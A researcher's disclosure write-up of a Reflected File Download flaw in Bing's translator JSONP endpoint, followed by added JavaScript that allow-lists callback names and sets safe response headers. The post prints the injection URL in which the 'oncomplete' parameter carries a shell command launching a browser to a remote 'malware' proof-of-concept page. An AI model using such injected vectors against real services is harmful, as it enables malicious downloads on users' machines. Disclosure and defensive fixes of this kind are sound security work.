When using the Bing online translator, I noticed an XHR request in my browser that caught my attention:
[code lang="html"]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499[/code]
This was reflected on the screen:
[code lang="html"]jQuery111207287312552798539_1444907172498();[/code]
As a security researcher, I always try to find different ways to bypass security, especially related to Reflected File Download. So I tried to inject an RFD vector into the "oncomplete" parameter:
[code lang="html"]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm[/code]
This was reflected on the screen:
[code lang="html"]start chrome davidsopas.com/poc/malware.htm();[/code]
Using the HTML5 download attribute, I was able to send a security report to Microsoft, which they fixed within a month.
With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the fourth time.
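One way a JSONP-style endpoint can refuse the kind of callback value shown above, as an added example that is not from the original post and is not Microsoft's fix. The function name `buildJsonpResponse`, the allow-list pattern and the header choices are assumptions.

```javascript
// Added example (hypothetical handler logic, not Bing's code).
// Allow-list for the callback parameter: a JavaScript identifier, optionally
// dotted (e.g. "jQuery123_456" or "app.onDone"). Spaces, slashes, pipes,
// quotes and every other shell-significant character fail the match.
const CALLBACK_RE =
  /^[A-Za-z_$][A-Za-z0-9_$]{0,63}(?:\.[A-Za-z_$][A-Za-z0-9_$]{0,63})*$/;

function buildJsonpResponse(callback, data) {
  if (typeof callback !== "string" || !CALLBACK_RE.test(callback)) {
    // Constant error body: nothing from the request is reflected back.
    return {
      status: 400,
      headers: {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
      },
      body: "invalid callback",
    };
  }
  // JSON.stringify leaves U+2028/U+2029 unescaped; escape them so the body
  // is also valid for older JavaScript parsers.
  const json = JSON.stringify(data ?? null)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
      // Script and XHR loads ignore this header; a direct navigation or a
      // link with the download attribute saves the body under a fixed,
      // harmless filename instead of one derived from the URL.
      "Content-Disposition": 'attachment; filename="f.txt"',
    },
    body: `${callback}(${json});`,
  };
}
```
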